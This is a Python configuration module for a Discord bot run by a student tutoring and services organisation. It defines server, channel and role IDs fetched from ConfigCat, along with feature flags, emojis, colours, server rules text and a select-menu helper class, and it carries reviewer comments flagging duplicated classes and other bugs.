    ch_announcements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_announcements", 898798323828396052))
    ch_notesAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_notesannouncements", 934951188149981234))
    ch_acadAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_acadannouncements", 863615526440534036))
    ch_coAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_coannouncements", 884256534756991017))
    ch_clubAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_clubannouncements", 887776723654045696))
    ch_mktAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_mktannouncements", 863613857116454912))
    ch_techAnnouncements = int(ConfigcatClient.DIGITAL_ID_CC.get_value("ch_techannouncements", 863615693597835274))
class TECH_ID:
    """
    IDs of the 'The Department of Information & Technology' server.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # *** Guilds ***
    g_tech = int(ConfigcatClient.TECH_ID_CC.get_value("g_tech", 805593783684562965))

    # *** Channels ***
    ch_tracebacks = int(ConfigcatClient.TECH_ID_CC.get_value("ch_tracebacks", 851949397533392936))
    ch_commissionLogs = int(ConfigcatClient.TECH_ID_CC.get_value("ch_commissionlogs", 849722616880300061))
    ch_ticketLog = int(ConfigcatClient.TECH_ID_CC.get_value("ch_ticketlog", 872915565600182282))
    ch_botreq = int(ConfigcatClient.TECH_ID_CC.get_value("ch_botreq", 933181562885914724))
    ch_announcements = int(ConfigcatClient.TECH_ID_CC.get_value("ch_announcements", 934109939373314068))
    ch_itAnnouncements = int(ConfigcatClient.TECH_ID_CC.get_value("ch_itannouncements", 932066545587327000))
    ch_webAnnouncements = int(ConfigcatClient.TECH_ID_CC.get_value("ch_webannouncements", 932487991958577152))
    ch_botAnnouncements = int(ConfigcatClient.TECH_ID_CC.get_value("ch_botannouncements", 932725755115368478))
    ch_snakePit = int(ConfigcatClient.TECH_ID_CC.get_value("ch_snakepit", 942076483290161203))

    # *** Categories ***
    cat_developerComms = int(ConfigcatClient.TECH_ID_CC.get_value("cat_developercomms", 873261268495106119))

    # *** Roles ***
    r_developerManager = int(ConfigcatClient.TECH_ID_CC.get_value("r_developermanager", 805596419066822686))
    r_assistantBotDevManager = int(
        ConfigcatClient.TECH_ID_CC.get_value(
            "r_assistantbotdevmanager", 816498160880844802
        )
    )
    r_botDeveloper = int(ConfigcatClient.TECH_ID_CC.get_value("r_botdeveloper", 805610985594814475))
class SandboxConfig:
    """
    IDs for the Sandbox Configuration.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # "404" doubles as the not-configured sentinel for this sandbox config.
    mode = str(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("mode", "404"))
    cat_sandbox = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_sandbox", 945459539967348787))

    # *** TutorVC ***
    ch_TV_console = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("ch_tv_console", 404))
    ch_TV_startVC = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("ch_tv_startvc", 404))

    # *** Category ***
    cat_scienceTicket = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_scienceticket", 800479815471333406))
    cat_fineArtsTicket = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_fineartsticket", 833210452758364210))
    cat_mathTicket = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_mathticket", 800472371973980181))
    cat_socialStudiesTicket = int(
        ConfigcatClient.SANDBOX_CONFIG_CC.get_value(
            "cat_socialstudiesticket", 800481237608824882
        )
    )
    cat_englishTicket = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_englishticket", 800475854353596469))
    cat_essayTicket = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_essayticket", 854945037875806220))
    cat_languageTicket = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_languageticket", 800477414361792562))
    cat_otherTicket = int(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_otherticket", 825917349558747166))
class CH_ID:
    """
    IDs of the Chat Helper server.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # *** Guilds ***
    g_ch = int(ConfigcatClient.CH_ID_CC.get_value("g_ch", 801974357395636254))

    # *** Categories ***
    cat_essay = int(ConfigcatClient.CH_ID_CC.get_value("cat_essay", 854945037875806220))
    cat_english = int(ConfigcatClient.CH_ID_CC.get_value("cat_english", 800475854353596469))
class MKT_ID:
    """
    IDs of the SS Marketing Department server.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # *** Guilds ***
    g_mkt = int(ConfigcatClient.MKT_ID_CC.get_value("g_mkt", 799855854182596618))

    # *** Channels ***
    ch_commands = int(ConfigcatClient.MKT_ID_CC.get_value("ch_commands", 799855856295608345))
    ch_commissionTranscripts = int(
        ConfigcatClient.MKT_ID_CC.get_value(
            "ch_commissiontranscripts", 820843692385632287
        )
    )
    ch_announcements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_announcements", 799855854244855847))
    ch_designAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_designannouncements", 891926914258829323))
    ch_mediaAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_mediaannouncements", 864050588023259196))
    ch_bpAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_bpannouncements", 852371717744885760))
    ch_eventsAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_eventsannouncements", 820508373791277067))
    ch_modAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_modannouncements", 820532007620575282))

    # *** Categories ***
    cat_design = int(ConfigcatClient.MKT_ID_CC.get_value("cat_design", 820873176208375838))
    cat_media = int(ConfigcatClient.MKT_ID_CC.get_value("cat_media", 882031123541143632))
    cat_discord = int(ConfigcatClient.MKT_ID_CC.get_value("cat_discord", 888668259220615198))

    # *** Roles ***
    r_discordManager = int(ConfigcatClient.MKT_ID_CC.get_value("r_discordmanager", 890778255655841833))
    r_discordTeam = int(ConfigcatClient.MKT_ID_CC.get_value("r_discordteam", 805276710404489227))
    r_designManager = int(ConfigcatClient.MKT_ID_CC.get_value("r_designmanager", 882755765910261760))
    r_designTeam = int(ConfigcatClient.MKT_ID_CC.get_value("r_designteam", 864161064526020628))
    r_contentCreatorManager = int(
        ConfigcatClient.MKT_ID_CC.get_value(
            "r_contentcreatormanager", 864165192148189224
        )
    )
class TUT_ID:
    """
    IDs of the SS Tutoring Division server.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # Every attribute is resolved through ConfigCat at import time; the second
    # get_value() argument is the hard-coded fallback snowflake.

    # *** Guilds ***
    g_tut = int(ConfigcatClient.TUT_ID_CC.get_value("g_tut", 860897711334621194))

    # *** Channels ***
    ch_botCommands = int(ConfigcatClient.TUT_ID_CC.get_value("ch_botcommands", 862480236965003275))
    ch_hourLogs = int(ConfigcatClient.TUT_ID_CC.get_value("ch_hourlogs", 873326994220265482))
    ch_announcements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_announcements", 861711851330994247))
    ch_leadershipAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_leadershipannouncements", 861712109757530112))
    ch_mathAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_mathannouncements", 860929479961739274))
    ch_scienceAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_scienceannouncements", 860929498782629948))
    ch_englishAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_englishannouncements", 860929517102039050))
    ch_ssAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_ssannouncements", 860929548639797258))
    ch_csAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_csannouncements", 860929585355948042))
    ch_miscAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_miscannouncements", 860929567132221481))
class HR_ID:
    """
    IDs of the SS HR Department server.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # Values are resolved via ConfigCat with hard-coded snowflake fallbacks.

    # *** Guilds ***
    g_hr = int(ConfigcatClient.HR_ID_CC.get_value("g_hr", 815753072742891532))

    # *** Channels ***
    ch_announcements = int(ConfigcatClient.HR_ID_CC.get_value("ch_announcements", 816507730557796362))
    ch_mktAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_mktannouncements", 816733579660754944))
    ch_acadAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_acadannouncements", 816733725244522557))
    ch_techAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_techannouncements", 816733303629414421))
    ch_leadershipAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_leadershipannouncements", 819009569979629569))

    # *** Roles ***
    r_hrStaff = int(ConfigcatClient.HR_ID_CC.get_value("r_hrstaff", 861856418117845033))
class LEADER_ID:
    """
    IDs of the Leadership Lounge server.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # NOTE(review): this class is declared a second time, with identical
    # contents, immediately after this definition. The later declaration
    # rebinds the name LEADER_ID, so this entire copy is dead code and should
    # be removed once confirmed.
    # *** Guilds ***
    g_leader = int(ConfigcatClient.LEADER_ID_CC.get_value("g_leader", 888929996033368154))
    # *** Channels ***
    ch_staffAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_staffannouncements", 936134263777148949))
    ch_envAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_envannouncements", 942572395640782909))
    ch_rebrandAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_rebrandannouncements", 946180039630782474))
    ch_workonlyAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_workonlyannouncements", 890993285940789299))
    ch_financeAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_financeannouncements", 919341240280023060))
    ch_mktAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_mktannouncements", 942792208841588837))
    ch_ssdAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_ssdannouncements", 947656507162525698))
    ch_mainAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_mainannouncements", 936464173687259226))
    # *** Roles ***
    r_corporateOfficer = int(ConfigcatClient.LEADER_ID_CC.get_value("r_corporateofficer", 900940957783056444))
    r_president = int(ConfigcatClient.LEADER_ID_CC.get_value("r_president", 900940957783056444))
    r_vicePresident = int(ConfigcatClient.LEADER_ID_CC.get_value("r_vicepresident", 888929996175978508))
    r_boardMember = int(ConfigcatClient.LEADER_ID_CC.get_value("r_boardmember", 888929996188549189))
    r_director = int(ConfigcatClient.LEADER_ID_CC.get_value("r_director", 892531463482900480))
    r_ssDigitalCommittee = int(ConfigcatClient.LEADER_ID_CC.get_value("r_ssdigitalcommittee", 912472488594771968))
    r_informationTechnologyManager = int(ConfigcatClient.LEADER_ID_CC.get_value("r_informationtechnologymanager", 943942441357172758))
    # NOTE(review): the attributes below duplicate HR_ID exactly (same
    # HR_ID_CC client, same keys, same fallbacks) and do not belong to the
    # Leadership Lounge server. This looks like a stray paste / merge
    # artifact — confirm and delete; callers should use HR_ID instead.
    # *** Roles ***
    r_hrStaff = int(ConfigcatClient.HR_ID_CC.get_value("r_hrstaff", 861856418117845033))
    # *** Channels ***
    ch_announcements = int(ConfigcatClient.HR_ID_CC.get_value("ch_announcements", 816507730557796362))
    ch_mktAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_mktannouncements", 816733579660754944))
    ch_acadAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_acadannouncements", 816733725244522557))
    ch_techAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_techannouncements", 816733303629414421))
    ch_leadershipAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_leadershipannouncements", 819009569979629569))
class LEADER_ID:
    """
    IDs of the Leadership Lounge server.
    NOTE: If you want to add IDs, please use the format as below.
    Format:
    g: discord.Guild
    ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
    cat: discord.CategoryChannel
    r: discord.Role
    msg: discord.Message
    """

    # NOTE(review): this is the second, identical declaration of LEADER_ID in
    # this module. It rebinds the name and is the definition that actually
    # takes effect; the earlier copy is dead code and should be removed.
    # *** Guilds ***
    g_leader = int(ConfigcatClient.LEADER_ID_CC.get_value("g_leader", 888929996033368154))
    # *** Channels ***
    ch_staffAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_staffannouncements", 936134263777148949))
    ch_envAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_envannouncements", 942572395640782909))
    ch_rebrandAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_rebrandannouncements", 946180039630782474))
    ch_workonlyAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_workonlyannouncements", 890993285940789299))
    ch_financeAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_financeannouncements", 919341240280023060))
    ch_mktAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_mktannouncements", 942792208841588837))
    ch_ssdAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_ssdannouncements", 947656507162525698))
    ch_mainAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_mainannouncements", 936464173687259226))
    # *** Roles ***
    # NOTE(review): r_corporateOfficer and r_president share the same fallback
    # snowflake (900940957783056444) — confirm whether that is intentional.
    r_corporateOfficer = int(ConfigcatClient.LEADER_ID_CC.get_value("r_corporateofficer", 900940957783056444))
    r_president = int(ConfigcatClient.LEADER_ID_CC.get_value("r_president", 900940957783056444))
    r_vicePresident = int(ConfigcatClient.LEADER_ID_CC.get_value("r_vicepresident", 888929996175978508))
    r_boardMember = int(ConfigcatClient.LEADER_ID_CC.get_value("r_boardmember", 888929996188549189))
    r_director = int(ConfigcatClient.LEADER_ID_CC.get_value("r_director", 892531463482900480))
    r_ssDigitalCommittee = int(ConfigcatClient.LEADER_ID_CC.get_value("r_ssdigitalcommittee", 912472488594771968))
    r_informationTechnologyManager = int(ConfigcatClient.LEADER_ID_CC.get_value("r_informationtechnologymanager", 943942441357172758))
class CheckDB_CC:
    """
    Checks and Safeguards for the Bot.

    Each flag is resolved through ConfigCat at import time; the second
    argument to get_value() is the hard-coded fallback used when the key is
    absent from the remote config.
    """

    # FIX: these are on/off flags, so coerce with bool() instead of int().
    # bool is a subclass of int, so existing truthiness tests and 0/1
    # comparisons by callers behave identically.
    MasterMaintenance = bool(
        ConfigcatClient.CHECK_DB_CC.get_value("mastermaintenance", False)
    )
    guildNone = bool(ConfigcatClient.CHECK_DB_CC.get_value("guildnone", False))
    externalGuild = bool(ConfigcatClient.CHECK_DB_CC.get_value("externalguild", True))
    ModRoleBypass = bool(ConfigcatClient.CHECK_DB_CC.get_value("modrolebypass", True))
    ruleBypass = bool(ConfigcatClient.CHECK_DB_CC.get_value("rulebypass", True))
    publicCategories = bool(
        ConfigcatClient.CHECK_DB_CC.get_value("publiccategories", False)
    )
    elseSituation = bool(ConfigcatClient.CHECK_DB_CC.get_value("elsesituation", True))
    # NOTE(review): "Persistant" is a typo for "Persistent", but the attribute
    # name is public API — keep until all call sites can be migrated.
    PersistantChange = bool(
        ConfigcatClient.CHECK_DB_CC.get_value("persistantchange", True)
    )
def get_value(
    class_type: Union[MAIN_ID, STAFF_ID, DIGITAL_ID, TECH_ID, MKT_ID, TUT_ID, HR_ID, LEADER_ID],
    value: str,
) -> int:
    """
    Get a value of a ID class within ConfigCat.

    Parameters:
        class_type: The class of the ID which should be returned
        value: The variable name (name of the ID)

    Raises:
        ValueError: If ConfigCat has no entry for ``value``.
    """
    # Fetch once and reuse: the original called ConfigcatClient.get_value()
    # twice (once for the existence guard, once for the fallback return),
    # doubling the lookups.
    fetched = ConfigcatClient.get_value(value, None)
    if fetched is None:
        raise ValueError(f"Cannot find {value} within ConfigCat!")
    if value in class_type.ID_DICT:
        # A local fallback exists for this key — let ConfigCat apply it.
        return int(ConfigcatClient.get_value(value, class_type.ID_DICT[value]))
    return int(fetched)
def config_patch(key, value):
    """Makes a PATCH request to ConfigCat to change a Sandbox Configuration.

    **NOTE:** This only supports changing the Sandbox category, anything else will not work.

    Args:
        key (str): Key to modify.
        value (str): Value to apply.

    Returns:
        requests.Response: requests.Response object representing the HTTP request.
    """
    endpoint = f"https://api.configcat.com/v1/settings/{key}/value?settingKeyOrId={key}"
    credentials = (os.getenv("CONFIG_CC_USER"), os.getenv("CONFIG_CC_PASSWORD"))
    # JSON-Patch document: replace the setting's value with the new one.
    operations = [{"op": "replace", "path": "/value", "value": str(value)}]
    response = requests.patch(
        endpoint,
        auth=credentials,
        headers={"X-CONFIGCAT-SDKKEY": os.getenv("SANDBOX_CONFIG_CC")},
        json=operations,
    )
    print(response.status_code)
    return response
class ErrorCodes:
    # NOTE(review): this dict literal is a bare expression — it is evaluated
    # and immediately discarded, so ErrorCodes ends up with no attributes at
    # all. It presumably should be assigned to a class attribute.
    # NOTE(review): both keys are the identical string "TOE-", so the second
    # entry silently overwrites the first; the intended prefixes must differ.
    # NOTE(review): `discord.errors` is a module, not an exception class —
    # confirm what the first list is meant to contain.
    {
        "TOE-": [discord.errors, DiscordException, ApplicationCommandError],
        "TOE-": [
            KeyError,
            TypeError,
        ],
    }
class Emoji:
    """
    Emojis to use for the bot.
    """

    # Custom-emoji strings in Discord's "<:name:id>" form ("<a:...>" for
    # animated). They only render in contexts where the bot can use them.
    space = "<:space:834967357632806932>"
    confirm = "<:confirm:860926261966667806>"
    deny = "<:deny:860926229335375892>"
    question = "<:question:861794223027519518>"
    warn = "<:warn:860926255443345409>"
    lock = "<:lock:860926195087835137>"
    unlock = "<:unlock:860926246937427989>"
    time = "<:time:860926238737825793>"
    # NOTE(review): unset placeholder — loadingGIF/loadingGIF2 below are
    # configured instead. Confirm whether this is intentional.
    loading = None
    redissue = "<:issue:860587949263290368>"
    archive = "<:file:861794167578689547>"
    cycle = "<:cycle:861794132585611324>"
    calender = "<:calendar:861794038739238943>"
    addgear = "<:add5x:862875088311025675>"
    minusgear = "<:minusgear:862875088217702421>"
    invalidchannel = "<:invalidchannel:862875088361619477>"
    barrow = "<:SS:865715703545069568>"
    person = "<:person:883771751127990333>"
    activity = "<:note:883771751190908989>"
    check = "<:success:834967474101420032>"
    cancel = "<:cancel:834967460075012106>"
    arrow = "<:rightDoubleArrow:834967375735422996>"
    mute = "<:mute:834967579264155658>"
    ban = "<:ban:834967435642929162>"
    reason = "<:activity:834968852558249999>"
    profile = "<:profile:835213199070593035>"
    creation = "<:creation:835213216299745291>"
    date = "<:thewickthing:835213229294223400>"
    discordLogo = "<:discord:812757175465934899>"
    discordLoad = "<a:Discord:866408537503694869>"
    pythonLogo = "<:python:945410067887435846>"
    javascriptLogo = "<:javascript:945410211752054816>"
    blobamused = "<:blobamused:895125015719194655>"
    timmyBook = "<:timmy_book:880875405962264667>"
    loadingGIF = "<a:Loading:904192577094426626>"
    loadingGIF2 = "<a:Loading:905563298089541673>"
    gsuitelogo = "<:gsuitelogo:932034284724834384>"
class hexColors:
    """
    Hex colors for the bot.
    """

    # *** Standard Colors ***
    yellow = 0xF5DD42
    orange = 0xFCBA03
    blurple = 0x6C7DFE
    light_purple = 0xD6B4E8
    dark_gray = 0x2F3136
    # Situation-specific embed colors (confirm / cancel / error states).
    yellow_ticketBan = 0xEFFA16
    green_general = 0x3AF250
    green_confirm = 0x37E32B
    red_cancel = 0xE02F2F
    red_error = 0xF5160A
    orange_error = 0xFC3D03
    mod_blurple = 0x4DBEFF
    ss_blurple = 0x7080FA
class Others:
    """
    Other things to use for the bot. (Images, characters, etc.)
    """

    # *** Image URLs ***
    ssLogo_png = "https://media.discordapp.net/attachments/864060582294585354/878682781352362054/ss_current.png"
    error_png = "https://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/sign-error-icon.png"
    nitro_png = "https://i.imgur.com/w9aiD6F.png"
    # *** Timmy Images ***
    timmyDog_png = "https://cdn.discordapp.com/attachments/875233489727922177/876610305852051456/unknown.png"
    timmyLaptop_png = "https://i.gyazo.com/5cffb6cd45e5e1ee9b1d015bccbdf9e6.png"
    timmyHappy_png = "https://i.gyazo.com/a0b221679db0f980504e64535885a5fd.png"
    timmyBook_png = "https://media.discordapp.net/attachments/875233489727922177/876603875329732618/timmy_book.png?width=411&height=533"
    timmyTeacher_png = "https://media.discordapp.net/attachments/875233489727922177/877378910214586368/tutoring.png?width=411&height=532"
    timmyDonation_png = "timmydonation.png"
    timmyDonation_path = "./utils/bots/CoreBot/LogFiles/timmydonation.png"
    # NOTE(review): intended as a blank filler for embeds; it appears here as
    # a plain space — verify no special (e.g. braille-blank) character was
    # lost in transit.
    space_character = " "
    # NOTE(review): presumably minutes (1440 = 24 h) before a ticket counts
    # as inactive — confirm the unit at the call site.
    TICKET_INACTIVE_TIME = 1440
    CHID_DEFAULT = 905217698865225728
    # Maps subject-help names to the Discord role ID that gets pinged.
    CHHelperRoles = {
        "Essay": 854135371507171369,
        "Essay Reviser": 854135371507171369,
        "English": 862160296914714645,
        "English Language": 862160080896000010,
        "English Literature": 862160567921541171,
        "Math": 862160874214129705,
        "Algebra": 862161250656976896,
        "Geometry": 862160836029317160,
        "Precalculus": 862160740509024337,
        "Calculus": 862160709252939837,
        "Statistics": 862160620563202079,
        "Science": 862160358264274944,
        "Biology": 862160682472439828,
        "Chemistry": 862160317794615296,
        "Physics": 862160774075383808,
        "Psych": 862160362677993493,
        "Social Studies": 862160071466811412,
        "World History": 862159919943254056,
        "US History": 862159910254673982,
        "US Gov": 862160366096482314,
        "Euro": 862159915660476427,
        "Human Geo": 862960195108601866,
        "Economy": 862159734257352724,
        "Languages": 862160078370635796,
        "French": 862160075559665724,
        "Chinese": 862143325683318804,
        "Korean": 862143319458316298,
        "Spanish": 856704808807563294,
        "Computer Science": 862160355622780969,
        "Fine Arts": 862160360626716733,
        "Research": 862159906148450314,
        "SAT/ACT": 862159736384258048,
    }
    # Server rules, keyed by rule number. Each value is
    # "<rule title> && <details>" — the " && " separator is presumably split
    # on elsewhere when rendering; keep it intact.
    rulesDict = {
        1: f"All Terms of Service and Community Guidelines apply. && {Emoji.barrow} https://discord.com/terms\n{Emoji.barrow} https://discord.com/guidelines",
        2: f"Keep chats and conversations mainly in English. && {Emoji.barrow} Full-blown conversations in a different language that disrupt the environment are not allowed.\n{Emoji.barrow} Disrupting an existing conversation in English in voice chat is not allowed.",
        3: f"Keep chats and conversations relevant. && {Emoji.barrow} Keep discussions about politics or anything else in <#773366189648642069>.\n{Emoji.barrow} Ask homework questions in the homework channels or tickets.",
        4: f"No content that does not belong in a school server. && {Emoji.barrow} No inappropriate user profiles, avatars, banners, statuses, about me, usernames, or nicknames.\n{Emoji.barrow} No sharing of content that glorifies or promotes suicide or self-harm.\n{Emoji.barrow} No trolling, raiding, epileptic, disturbing, suggestive, or offensive behavior.\n{Emoji.barrow} No sexist, racist, homophobic, transphobic, xenophobic, islamophobic, pedophilic, creepy behavior, etc.",
        5: f"No advertising or self-promotion (unless given explicit permission). && {Emoji.barrow} Self-advertising a website, group, or anything else through DMs, VC or in the server is not allowed.\n{Emoji.barrow} Explicitly asking users to look at advertisements in status/About Me is not allowed.",
        6: f"No toxic behavior or harassment. && {Emoji.barrow} No discriminatory jokes or language towards an individual or group due to race, ethnicity, nationality, sex, gender, sexual orientation, religious affiliation, or disabilities.\n{Emoji.barrow} Disrespect of members is not allowed, especially if it is continuous, repetitive, or severe.\n{Emoji.barrow} Encouraging toxicity, harassment, bullying, and anything of the sort is prohibited.",
        7: f"No illegal or explicit material. && {Emoji.barrow} Discussing or sharing illegal content is prohibited. This includes, but is not limited to: copyrighted content, pirated content, illegal activities, crimes, IPGrabbers, phishing links.\n{Emoji.barrow} Any form of NSFW, NSFL, or explicit content (pornographic, overtly sexual, overly gory) is prohibited.",
        8: f"No DDoS, dox, death or any other sort of threats. && {Emoji.barrow} Indirect or direct threats to harm someone else are strictly prohibited and causes for immediate ban.\n{Emoji.barrow} DDoS (Distributed Denial of Service): sending a large amount of requests in a short amount of time.\n{Emoji.barrow} Dox: revealing any private information of another member, such as real name or address, without consent.",
        9: f"No slurs and excessive or harmful profanity usage. && {Emoji.barrow} Using or attempting to use slurs and racist terms is prohibited.\n{Emoji.barrow} Excessive profanity, verbal abuse and insults are prohibited.",
        10: f"No cheating in any form. && {Emoji.barrow} It is strictly prohibited to cheat or engage in academic dishonesty anywhere in the server.",
        11: f"No spamming in any form. && {Emoji.barrow} Spamming links, images, messages, roles, emojis, emotes, emote reactions, or anything else is not allowed.",
        12: f"No impersonation in any form. && {Emoji.barrow} Changing your username or avatar to something similar as any staff or members with the intent to mimic them and create confusion is prohibited. ",
        13: f"No disruptive behavior in voice chat. && {Emoji.barrow} No continuous hopping between voice chats.\n{Emoji.barrow} No starting and closing streams in short intervals.\n{Emoji.barrow} No loud, annoying, or high-pitched noises.\n{Emoji.barrow} No voice changers if asked to stop.",
        14: f"No evading user blocks, punishments, or bans by using alternate accounts. && {Emoji.barrow} Sending unwanted, repeated friend requests or messages to contact someone who has blocked you is prohibited.\n{Emoji.barrow} Creating alternate accounts to evade a punishment or ban, harass or impersonate someone, or participate in a raid are all strictly prohibited.\n{Emoji.barrow} Suspicions of being an alternate account are cause for a ban with no prior warning.\n{Emoji.barrow} To discuss punishments or warnings, create a support ticket or talk to a moderator in DMs.",
    }
class bcolors:
    """ANSI terminal escape sequences for colored console output."""

    HEADER = "\033[95m"
    OKBLUE = "\033[94m"
    OKCYAN = "\033[96m"
    OKGREEN = "\033[92m"
    WARNING = "\033[93m"
    FAIL = "\033[91m"
    ENDC = "\033[0m"  # reset — always append after a colored span
    BOLD = "\033[1m"
    UNDERLINE = "\033[4m"
class EmbeddedActivity:
    """
    Application IDs for Discord embedded activities (voice-channel games/apps).

    NOTE(review): these appear to be Discord's publicly circulated activity
    application IDs (Poker Night, Chess in the Park, Watch Together, ...) —
    verify against Discord's current list before relying on them.
    """

    awkword = 879863881349087252
    betrayal = 773336526917861400
    cg2_qa = 832012815819604009
    cg2_staging = 832012730599735326
    cg3_dev = 832012682520428625
    cg3_prod = 832013003968348200
    cg3_qa = 832012894068801636
    cg3_staging = 832012938398400562
    cg4_dev = 832013108234289153
    cg4_prod = 832025144389533716
    cg4_qa = 832025114077298718
    cg4_staging = 832025061657280566
    chess_in_the_park_dev = 832012586023256104
    chess_in_the_park = 832012774040141894
    decoders_dev = 891001866073296967
    doodle_crew = 878067389634314250
    doodle_crew_dev = 878067427668275241
    fishington = 814288819477020702
    letter_tile = 879863686565621790
    pn_staging = 763116274876022855
    poker_night = 755827207812677713
    poker_qa = 801133024841957428
    putts = 832012854282158180
    sketchy_artist = 879864070101172255
    sketchy_artist_dev = 879864104980979792
    spell_cast = 852509694341283871
    watch_together = 880218394199220334
    watch_together_dev = 880218832743055411
    word_snacks = 879863976006127627
    word_snacks_dev = 879864010126786570
    youtube_together = 755600276941176913
class SelectMenuHandler(ui.Select):
    """Adds a SelectMenu to a specific message and returns it's value when option selected.

    Usage:
    To do something after the callback function is invoked (the button is pressed), you have to pass a
    coroutine to the class. IMPORTANT: The coroutine has to take two arguments (discord.Interaction, discord.View)
    to work.
    """

    def __init__(
        self,
        options: typing.List[SelectOption],
        custom_id: typing.Union[str, None] = None,
        place_holder: typing.Union[str, None] = None,
        max_values: int = 1,
        min_values: int = 1,
        disabled: bool = False,
        select_user: typing.Union[discord.Member, discord.User, None] = None,
        roles: List[discord.Role] = None,
        interaction_message: typing.Union[str, None] = None,
        ephemeral: bool = True,
        coroutine: coroutineType = None,
        view_response=None,
    ):
        """
        Parameters:
            options: List of discord.SelectOption
            custom_id: Custom ID of the view. Default to None.
            place_holder: Place Holder string for the view. Default to None.
            max_values: Maximum values that are selectable. Default to 1.
            min_values: Minimum values that are selectable. Default to 1.
            disabled: Whenever the button is disabled or not. Default to False.
            select_user: The user that can perform this action, leave blank for everyone. Defaults to None.
            roles: Roles that may also use the menu even if select_user is set. Default to None.
            interaction_message: The response message when pressing on a selection. Default to None.
            ephemeral: Whenever the response message should only be visible for the select_user or not. Default to True.
            coroutine: A coroutine invoked after a selection; if None the view is stopped instead. Default to None.
            view_response: Receives the selected value when a custom_id is set. Default to None.
        """
        self.options_ = options
        self.custom_id_ = custom_id
        self.select_user = select_user
        self.roles = roles
        self.disabled_ = disabled
        self.placeholder_ = place_holder
        self.max_values_ = max_values
        self.min_values_ = min_values
        self.interaction_message_ = interaction_message
        self.ephemeral_ = ephemeral
